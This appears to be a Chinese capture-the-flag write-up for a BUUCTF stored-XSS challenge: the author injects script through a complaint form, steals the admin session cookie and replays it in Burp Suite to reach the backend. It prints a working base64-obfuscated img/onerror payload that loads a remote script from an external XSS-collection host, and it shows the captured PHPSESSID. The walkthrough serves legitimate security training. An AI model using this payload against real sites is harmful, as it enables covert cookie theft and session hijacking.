【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
想唱rap9 分钟前
C++ list 类的使用
c语言·开发语言·数据结构·c++·笔记·算法·list
摘星编程13 分钟前
【成长纪实】HarmonyOS Next学习地图:新手避坑指南与核心知识点拆解
学习·华为·harmonyos·鸿蒙开发
朝新_1 小时前
【EE初阶】JVM
java·开发语言·网络·jvm·笔记·算法·javaee
会开花的二叉树2 小时前
应用层网络协议深度解析:设计、实战与安全
网络·网络协议·安全
witkey_ak98962 小时前
网安面试题收集(4)
网络安全
红树林072 小时前
beef-xss网页无法访问
安全·web安全·xss
牛马大师兄2 小时前
STM32实现低功耗管理使用配置知识梳理笔记
笔记·stm32·单片机·嵌入式硬件·物联网·低功耗
这儿有一堆花2 小时前
AI 翻译入门指南:机器如何理解语言
人工智能·web
wanhengidc3 小时前
站群服务器都有什么作用
服务器·安全·智能手机·玩游戏
鲜枣课堂3 小时前
重新安全定义,IMS算网融合加速企业专网AI+场景落地
大数据·人工智能·安全